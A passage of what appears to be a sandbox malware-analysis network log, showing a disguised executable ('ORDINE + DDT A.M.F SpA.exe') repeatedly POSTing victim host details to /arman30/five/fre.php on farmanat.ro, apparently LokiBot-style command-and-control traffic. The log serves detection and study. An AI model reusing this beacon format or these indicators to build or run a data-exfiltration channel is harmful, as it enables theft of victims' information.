                                              Nov 25, 2021 10:48:15.068809032 CET6334OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:15.102410078 CET6334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:15.152544022 CET6335INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              210192.168.11.2050052176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:57.509550095 CET6613OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:57.543764114 CET6613OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:57.599325895 CET6614INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              211192.168.11.2050053176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:58.004626989 CET6615OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:58.038615942 CET6615OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:58.094089031 CET6615INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              212192.168.11.2050054176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:58.514003038 CET6616OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:58.547497034 CET6616OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:58.599456072 CET6616INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              213192.168.11.2050055176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:59.022258043 CET6617OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:59.056468010 CET6617OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:59.109958887 CET6618INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              214192.168.11.2050056176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:59.545414925 CET6619OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:59.579639912 CET6619OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:59.630707979 CET6619INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              215192.168.11.2050057176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:00.060117006 CET6620OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:00.093959093 CET6620OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:00.143248081 CET6620INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              216192.168.11.2050058176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:00.566565990 CET6621OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:00.600120068 CET6621OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:00.649194956 CET6622INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              217192.168.11.2050059176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:01.074114084 CET6622OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:01.107786894 CET6623OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:01.157417059 CET6623INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              218192.168.11.2050060176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:01.589853048 CET6624OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:01.623557091 CET6624OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:01.676860094 CET6624INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              219192.168.11.2050061176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:02.090230942 CET6625OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:02.124475002 CET6625OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:02.179992914 CET6626INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              22192.168.11.2049857176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:15.740662098 CET6335OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:15.774986029 CET6336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:15.825707912 CET6336INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              220192.168.11.2050062176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:02.599251032 CET6626OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:02.632785082 CET6627OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:02.692435980 CET6627INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              221192.168.11.2050063176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:03.115367889 CET6628OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:03.148951054 CET6628OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:03.229101896 CET6628INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              222192.168.11.2050064176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:03.594284058 CET6629OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:03.628284931 CET6629OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:03.702130079 CET6630INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              223192.168.11.2050065176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:04.083753109 CET6630OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:04.117153883 CET6631OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:04.190560102 CET6631INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              224192.168.11.2050066176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:04.617831945 CET6632OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:04.651456118 CET6632OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:04.764955044 CET6632INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              225192.168.11.2050067176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:05.185904980 CET6633OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:05.220136881 CET6633OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:05.275226116 CET6634INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              226192.168.11.2050068176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:05.692300081 CET6634OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:05.725790977 CET6635OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:05.779927969 CET6635INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
